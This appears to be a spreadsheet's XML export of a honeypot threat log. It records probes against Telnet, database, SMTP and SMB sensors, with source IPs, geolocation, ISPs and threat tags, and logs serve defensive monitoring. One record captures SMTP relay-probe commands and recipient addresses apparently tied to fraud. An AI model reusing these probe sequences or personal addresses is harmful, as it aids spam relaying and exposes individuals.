    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Caraguatatuba"/>
    <s v="Caraguatatuba"/>
    <s v="3467081"/>
    <s v="NA"/>
    <s v="-23.6203"/>
    <s v="-45.4131"/>
    <s v="268645"/>
    <s v="FUTURE DIGITAL TECHNOLOGY E TELECOM LTDA EPP"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="business"/>
    <s v="Future Digital Technology E Telecom Ltda EPP"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2da4:b1a8"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1367"/>
    <x v="1367"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T08:55:29"/>
    <d v="2025-04-17T08:53:00"/>
    <d v="2025-04-17T08:55:29"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="26"/>
    <s v="Thừa Thiên Huế Province"/>
    <s v="Phú Lộc District"/>
    <s v="Phú Lộc"/>
    <s v="1570496"/>
    <s v="NA"/>
    <s v="16.2803"/>
    <s v="107.859"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Group"/>
    <s v="residential"/>
    <s v="VIETTEL"/>
    <s v="2007-05-18"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7462:f981"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1368"/>
    <x v="1368"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T08:47:27"/>
    <d v="2025-04-17T08:47:27"/>
    <d v="2025-04-17T08:47:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:f044"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1369"/>
    <x v="1369"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T08:34:34"/>
    <d v="2024-11-25T18:40:37"/>
    <d v="2025-04-17T08:34:34"/>
    <n v="69"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433&amp;&amp;54461&amp;&amp;54453"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Ernakulam"/>
    <s v="Kochi (Pallimukku)"/>
    <s v="1273874"/>
    <s v="682016"/>
    <s v="9.96261"/>
    <s v="76.2876"/>
    <s v="133301"/>
    <s v="DWANIRINN"/>
    <s v="Dwan Supports P LTD"/>
    <s v="business"/>
    <s v="Dwan Supports P LTD"/>
    <s v="2014-08-29"/>
    <s v="DWANIRINN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6726:f03"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1370"/>
    <x v="1370"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T08:23:50"/>
    <d v="2025-04-17T08:23:50"/>
    <d v="2025-04-17T08:23:50"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:c58a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1371"/>
    <x v="1371"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T08:11:20"/>
    <d v="2025-03-20T03:50:32"/>
    <d v="2025-04-17T08:11:20"/>
    <n v="203"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_SMTP_HC1"/>
    <s v="25&amp;&amp;NA&amp;&amp;60532"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="LI"/>
    <s v="Limburg"/>
    <s v="Kerkrade Municipality"/>
    <s v="Eygelshoven"/>
    <s v="2756285"/>
    <s v="6471"/>
    <s v="50.8956"/>
    <s v="6.06924"/>
    <s v="214940"/>
    <s v="KPROHOST LLC"/>
    <s v="Kprohost LLC"/>
    <s v="hosting"/>
    <s v="Pitline Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 19 Mar 2025 15:18:29 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 19 Mar 2025 16:04:59 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '66.94.127.183_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 24 Mar 2025 00:49:48 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 28 Mar 2025 15:06:38 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 31 Mar 2025 04:47:53 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 1 Apr 2025 04:52:58 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 1 Apr 2025 06:02:32 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@yahoo.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;union_bnk_customer_service@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;jona_okons@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;princeokons477@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;unionbanknigplc@mail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;jonathanokons@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '122.170.7.108_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 4 Apr 2025 15:00:17 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 4 Apr 2025 16:07:05 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@yahoo.comy&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;no-reply@misa.vn&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;garbasani5555@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ikkpulukestuff@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;dr.jackins@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;kendo_forreal@yahoo.com.sg&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;kendoforreal@yandex.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ikkpulukestuff@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 14 Apr 2025 00:41:31 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '91.194.11.82_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 16 Apr 2025 16:12:49 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c3d3:bf29"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low&amp;&amp;Medium&amp;&amp;High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1372"/>
    <x v="1372"/>
    <s v="c-68-37-173-70.hsd1.mi.comcast.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T08:10:26"/>
    <d v="2025-04-15T00:44:13"/>
    <d v="2025-04-17T08:10:26"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="MI"/>
    <s v="Michigan"/>
    <s v="Washtenaw"/>
    <s v="Chelsea"/>
    <s v="4988628"/>
    <s v="48118"/>
    <s v="42.3788"/>
    <s v="-84.0802"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4425:ad46"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1373"/>
    <x v="1373"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T08:03:56"/>
    <d v="2025-04-17T08:03:56"/>
    <d v="2025-04-17T08:03:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Malappuram"/>
    <s v="Malappuram"/>
    <s v="1264154"/>
    <s v="NA"/>
    <s v="11.042"/>
    <s v="76.0815"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:8807"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1374"/>
    <x v="1374"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T07:59:28"/>
    <d v="2025-04-17T07:59:28"/>
    <d v="2025-04-17T07:59:28"/>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d9:15ff"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1375"/>
    <x v="1375"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T07:58:50"/>
    <d v="2025-04-17T07:58:50"/>
    <d v="2025-04-17T07:58:50"/>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3d03:dbac"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1376"/>
    <x v="1376"/>
    <s v="59-127-210-50.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T07:58:31"/>
    <d v="2025-04-15T06:46:12"/>
    <d v="2025-04-17T07:58:31"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23"/>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
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:d232"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1377"/>
    <x v="1377"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T07:40:56"/>
    <d v="2025-04-17T07:40:56"/>
    <d v="2025-04-17T07:40:56"/>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f1:b5cf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1378"/>
    <x v="1378"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T07:22:31"/>
    <d v="2025-04-17T07:21:27"/>
    <d v="2025-04-17T07:22:31"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Selatan"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.22639"/>
    <s v="106.832"/>
    <s v="4787"/>
    <s v="PT Cyberindo Aditama"/>
    <s v="Indonesia Network Information Center"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6772:899a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1379"/>
    <x v="1379"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T07:15:42"/>
    <d v="2024-04-17T07:39:20"/>
    <d v="2025-04-17T07:15:42"/>
    <n v="638"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;389&amp;&amp;1080&amp;&amp;5900&amp;&amp;445&amp;&amp;80&amp;&amp;22&amp;&amp;9100&amp;&amp;30531&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.20309"/>
    <s v="106.845"/>
    <s v="131111"/>
    <s v="PT Mora Telematika Indonesia"/>
    <s v="MORATELINDONAP"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,64433)}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,55583)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,50154)}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,50340)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,56813)}&amp;&amp;{Data_SMB:Incoming connection (103.154.114.130,57111)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:679a:7282"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1380"/>
    <x v="1380"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T07:12:47"/>
    <d v="2025-04-17T07:12:25"/>
    <d v="2025-04-17T07:12:47"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="10"/>
    <s v="Isfahan"/>
    <s v="Isfahan"/>
    <s v="Isfahan"/>
    <s v="418863"/>
    <s v="NA"/>
    <s v="32.6554"/>
    <s v="51.6737"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="residential"/>
    <s v="Telecommunication Company of Esfahan"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:25ff:df08"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1381"/>
    <x v="1381"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T07:10:26"/>
    <d v="2025-04-16T10:19:40"/>
    <d v="2025-04-17T07:10:26"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="EG"/>
    <s v="Egypt"/>
    <s v="GZ"/>
    <s v="Giza"/>
    <s v="Dokki"/>
    <s v="Giza"/>
    <s v="360995"/>
    <s v="NA"/>
    <s v="30.0383"/>
    <s v="31.2102"/>
